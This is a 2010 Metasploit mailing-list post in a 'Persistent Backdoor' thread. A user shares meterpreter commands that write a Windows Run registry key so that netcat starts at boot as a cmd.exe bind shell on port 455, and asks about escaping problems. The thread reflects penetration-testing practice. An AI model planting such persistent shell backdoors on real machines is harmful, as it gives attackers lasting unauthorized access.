Metasploit mailing list archives
Re: Persistent Backdoor
From: Eric <dkn4a1 () gmail com>
Date: Tue, 5 Oct 2010 23:14:42 +0530
On Mon, Oct 4, 2010 at 7:10 PM, David Kennedy <kennedyd013 () gmail com> wrote:
Why not use run persistence from meterpreter?
But, what if I want to manipulate other registry entries? AFAICS, some escape character problem with this, coz even after executing either of commands, the value set is meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc Key: HKLM\software\microsoft\windows\currentversion\Run Name: nc Type: REG_SZ Data: C:windowssystem32nc.exe -Ldp 455 -e cmd.exe Any idea?
On Oct 4, 2010 9:36 AM, "Eric" <dkn4a1 () gmail com> wrote:Hi, meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe" nor meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe" doesn't seem to work for me :-( _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Persistent Backdoor Eric (Oct 04)
- Re: Persistent Backdoor David Kennedy (Oct 04)
- Re: Persistent Backdoor John Nash (Oct 04)
- Re: Persistent Backdoor Eric (Oct 05)
- Re: Persistent Backdoor Tom Van de Wiele (Oct 09)
- Re: Persistent Backdoor Miguel Rios (Oct 10)
- Re: Persistent Backdoor Sherif El-Deeb (Oct 10)
- Re: Persistent Backdoor David Kennedy (Oct 04)